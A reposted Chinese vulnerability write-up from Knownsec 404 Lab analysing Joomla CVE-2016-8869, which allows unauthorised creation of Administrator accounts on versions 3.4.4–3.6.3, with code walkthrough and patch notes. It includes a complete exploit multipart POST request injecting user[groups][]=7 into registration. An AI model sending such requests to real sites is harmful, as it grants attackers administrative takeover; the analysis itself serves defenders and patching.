【漏洞研究】[漏洞分析]Joomla未授权创建特权用户漏洞(CVE-2016-8869)分析

Author : p0wd3r (知道创宇404安全实验室),原文地址:http://paper.seebug.org/88/


0x00 漏洞概述


1.漏洞简介


Joomla是一个自由开源的内容管理系统,近日研究者发现在其3.4.4到3.6.3的版本中存在两个漏洞:CVE-2016-8869,CVE-2016-8870。我们在这里仅分析CVE-2016-8869,利用该漏洞,攻击者可以在网站关闭注册的情况下注册特权用户。Joomla官方已对此漏洞发布升级公告。


2.漏洞影响


网站关闭注册的情况下仍可创建特权用户


3.影响版本


3.4.4 to 3.6.3


0x01 漏洞复现


1. 环境搭建


复制代码
  1. wget https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz


解压后放到服务器目录下,例如/var/www/html

创建个数据库:
复制代码
  1. docker run --name joomla-mysql -e MYSQL_ROOT_PASSWORD=hellojoomla -e MYSQL_DATABASE=jm -d mysql


访问服务器路径进行安装即可。


2.漏洞分析


注册

注册部分可参考:《Joomla未授权创建用户漏洞(CVE-2016-8870)分析》

提权

下面我们来试着创建一个特权用户。

在用于注册的register函数中,我们先看一下$model->register($data)这个存储注册信息的方法,在components/com_users/models/registration.php中:
复制代码
  1. public function register($temp)  
  2.     {
  3.         $params = JComponentHelper::getParams('com_users');
  5.         // Initialise the table with JUser.
  6.         $user = new JUser;
  7.         $data = (array) $this->getData();
  9.         // Merge in the registration data.
  10.         foreach ($temp as $k => $v)
  11.         {
  12.             $data[$k] = $v;
  13.         }
  14.         ...
  15.     }


可以看到这里使用我们可控的$temp给$data赋值,进而存储注册信息。正常情况下,$data在赋值之前是这样的:


而正常情况下我们可控的$temp中是没有groups这个数组的,所以正常注册用户的权限就是我们配置中设置的权限,对应的就是groups的值。

那么提升权限的关键就在于更改groups中的值,因为$data由我们可控的$temp赋值,$temp的值来自于请求包,所以我们可以构造如下请求包:
复制代码
  1. POST /index.php/component/users/?task=registration.register HTTP/1.1  
  2. ...
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI  
  4. ...
  5. Cookie: yourcookie
  7. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  8. Content-Disposition: form-data; name="user[name]"
  10. attacker2  
  11. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  12. Content-Disposition: form-data; name="user[username]"
  14. attacker2  
  15. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  16. Content-Disposition: form-data; name="user[password1]"
  18. attacker2  
  19. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  20. Content-Disposition: form-data; name="user[password2]"
  22. attacker2  
  23. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  24. Content-Disposition: form-data; name="user[email1]"
  26. [email protected]  
  27. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  28. Content-Disposition: form-data; name="user[email2]"
  30. [email protected]  
  31. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  32. Content-Disposition: form-data; name="user[groups][]"
  34. 7  
  35. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  36. Content-Disposition: form-data; name="option"
  38. com_users  
  39. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  40. Content-Disposition: form-data; name="task"
  42. user.register  
  43. ------WebKitFormBoundaryefGhagtDbsLTW5qI
  44. Content-Disposition: form-data; name="yourtoken"
  46. 1  
  47. ------WebKitFormBoundaryefGhagtDbsLTW5qI--



这里我们添加一组值:name="user[groups][]" value=7,让user被当作二维数组,从而groups被识别为数组,并设置数组第一个值为7,对应着Administrator的权限。

然后发包,通过调试可以看到$temp中已经有了groups数组:


最后创建了一个权限为Administrator的用户attacker2:



通过存在漏洞的注册函数我们可以提权,那么在允许注册的情况下我们可不可以通过正常的注册函数来提权呢?

通过对比这两个函数,可以发现这样一点:

复制代码
  1. UsersControllerRegistration::register():
  3. public function register()  
  4.     {
  5.         ...
  7.         $data = $model->validate($form, $requestData);
  8.         ...
  10.         // Attempt to save the data.
  11.         $return = $model->register($data);
  12.         ...
  13.     }
  14. UsersControllerUser::register():
  16. public function register()  
  17.     {
  18.         ...
  20.         $return = $model->validate($form, $data);
  21.         ...
  23.         // Attempt to save the data.
  24.         $return = $model->register($data);
  25.         ...
  26.     }


可以看到UsersControllerRegistration::register()中存储了对$requestData验证后的$data,而UsersControllerUser::register()虽然同样进行了验证,但是存储的仍是之前的$data。所以重点是validate函数是否对groups进行了过滤,我们跟进一下,在libraries/legacy/model/form.php中:

复制代码
  1. public function validate($form, $data, $group = null)  
  2.     {
  3.         ...
  4.         // Filter and validate the form data.
  5.         $data = $form->filter($data);
  6.         ...
  7.     }


再跟进filter函数,在libraries/joomla/form/form.php中:
复制代码
  1. public function filter($data, $group = null)  
  2.     {
  3.         ...
  5.         // Get the fields for which to filter the data.
  6.         $fields = $this->findFieldsByGroup($group);
  8.         if (!$fields)
  9.         {
  10.             // PANIC!
  11.             return false;
  12.         }
  14.         // Filter the fields.
  15.         foreach ($fields as $field)
  16.         {
  17.             $name = (string) $field['name'];
  19.             // Get the field groups for the element.
  20.             $attrs = $field->xpath('ancestor::fields[@name]/@name');
  21.             $groups = array_map('strval', $attrs ? $attrs : array());
  22.             $group = implode('.', $groups);
  24.             $key = $group ? $group . '.' . $name : $name;
  26.             // Filter the value if it exists.
  27.             if ($input->exists($key))
  28.             {
  29.                 $output->set($key, $this->filterField($field, $input->get($key, (string) $field['default'])));
  30.             }
  31.         }
  33.         return $output->toArray();
  34.     }


可以看到这里仅允许$fields中的值出现在$data中,而$fields中是不存在groups的,所以groups在这里被过滤掉,也就没有办法进行权限提升了。




3.补丁分析




官方删除了UsersControllerUser::register()方法。



0x02 修复方案

升级到3.6.4



0x03 参考

https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html

http://www.fox.ra.it/technical-articles/how-i-found-a-joomla-vulnerability.html

https://www.youtube.com/watch?v=Q_2M2oJp5l4





技术交流QQ群: 397745473
来自:https://xianzhi.aliyun.com/forum/read/130.html?fpage=16

评论

发表评论

此博客中的热门博文

【黑产分析】互联网业务安全的黑灰产业链的故事

图片
本文系转载,作者:独孤qiu败;原文地址:http://bobao.360.cn/learning/detail/3214.html 之前写过一篇关于支付风控体系设计的文章,但是对于互联网电商而言,支付环节的风险仅仅是一环,对于很多没有能力构建风控系统的中小创企业而言,他们觉得自己不在乎多花点手续费选择网银、第三方支付方式来规避支付环节的风险,但是中小创企业就能天真的以为他们的业务安全了么,恩,真的是too young too 天真(抱歉,从小用汉字标注英文发音的我表示这个单词不会写~)。 在互联网行业做风控,首先需要学会的是,你要知道你的对手是谁、他们是怎么做的、他们想做什么、他们在哪做、他们什么时候做(who,how,what,where,when),这样才能不断提高现有的业务风控水平,在不断变化的业务环境中get到新业务可能存在的风险点并做好对预知风险的防范措施。 所谓道魔互博,只有对对手足够了解,才能不断提高风险防范水平,在用户感知不到的节点为所有业务部门提供业务的支撑保护。 不以盈利为目的的黑产都不是好黑产,如下图: 当然,我这里指的仅仅是电商/信贷行业的业务风险,对于互联网这个圈子而言,会被黑产盯上的行业太多,比如游戏私服、网络彩票、色情赌博等,但凡有利益的行业都会有人去干;而企业面临的黑产风险类型也很多,主要分为技术风险与业务风险,大体上可以如下分类,为了配合本文行文方便,对我所已知的风险做了如下分类: 表1:互联网行业面临的风险分类 当然这里对风险的分类其实并不准确,但是结合我之前的工作,本文想阐述的仅仅是表格中的阴影部分,这些风险点对于企业而言就犹如溃坝的蚁穴一般,单个风险点损失不是很大,几千几万的损失而已,但是不加控制就会全节点开花。因此对于一家略微成熟的互联网企业,所面临的风险一定是多层次全方位的,单单只对一个节点的控制是远远不能满足业务发展的需要的。 另外,很想跟大家说的一点是,很多业务风险的黑色产业从业者基本没有太高的技术水平,他们是整个环节的下游部分,基于网络上形形色色的数据信息来钻公司流程规则的漏洞。 这些对于业务风险点的风控体系设计后续可能会单独另开一篇文章,但是作为一名立志要干好风控的同学来说,知己知彼,知道这些业务风险的黑色产业链对于做好风险点的业务防控至关重要,这么好学的宝宝...
阅读全文

【黑产分析】Aveo恶意软件分析

图片
Palo Alto Networks 发现了一个名为 Aveo 的恶意软件家族,它针对日语用户开发。Aveo 的名字来自于其二进制文件中的嵌入式调试字符串。Aveo 恶意软件家族与 ForrmerFirstRAT 恶意软件家族有密切的联系,二者都 针对日语用户 。Aveo 会伪装成 Microsoft Excel 文档,并在执行时抛出诱饵文件。诱饵文档与埼玉工業大学 Ido 实验室的研究有关。执行后,Aveo 可以接收多种命令,这将允许攻击者完全控制感染主机。 部署 Aevo 的样本会伪装成 Microsoft Excel 文档,如下图所示。值得注意的是,malware.exe 只是一个占位符,原文件名未知。 该可执行文件其实是一个 WinRAR 的自解压可执行文件,它会在执行时抛出诱饵文档和 Aveo 木马来运行。下图就是抛出的诱饵文档,在运行之后打开: 这个诱饵文档是关于 Ido 实验室 2016 年研究立项的信息。该文件列出了 16 名参加 CAVE 的名单,包括名字、单位以及邮件地址。这个文档用日语书写,文件名也是日文 CAVE研究会参加者.xls ,这些都表明该恶意软件是针对日语用户的。此外,Aveo 和 FormerFirstRAT 家族的相似性将会在稍后讨论,这个讨论将进一步支持该恶意软件是针对日语用户的。 基础设施 Aveo 木马配置了以下域名来进行 HTTP 通信: snoozetime [.] info [email protected] 最早在 2015 年 5 月就注册了,自那时起,该邮箱已经和以下三个 IP 地址关联上了: 104 .202 .173 [.] 82 107 .180 .36 [.] 179 50 .63 .202 [.] 38 所有这些 IP 地址都位于美国境内。 从 snoozetime[.]info 的 WHOIS 信息来看,注册邮箱为jack.ondo@mail[.]com,注册名为aygt5ruhrj aygt5ruhrj gerhjrt。根据这两条线索进行拓展: bluepaint [.] info coinpack [.] info 7 b7p [.] info donkeyhaws [.] info europcubit [.] com jhmiyh .ny @ ...
阅读全文

【黑产分析】《中国互联网地下产业链分析白皮书》

图片
《中国互联网地下产业链分析白皮书》 灰色黑色产业链商业模式及互联网黑市深度数据分析洞察 ,全面解析互联网面临的地下黑产的深度分析; 下载地址: 复制代码 https://pan.baidu.com/s/1o7T7R0e 提取密码: a4qh 复制代码 目录: 关产业链部分整体分析 . .............................................................. 18 A. 流量获取分发产业链整体情况. ............................................................................................ 19 B. 细分产业链之间生态关系分析. ............................................................................................ 22 C. 流量获取分发的黑市深度数据. ............................................................................................ 23 1. 搜索引擎流量与分发产业链分析. ......................................................................... 23 A. 相关地下产业链整体深度分析. ............................................................................................ 27 B. 黑帽 SEO 地下产业链深度分析 . ......................................................................................... 28 C. 黑链交易地下产业链深度分析. ............................................................................................ 29 D. SEM ...
阅读全文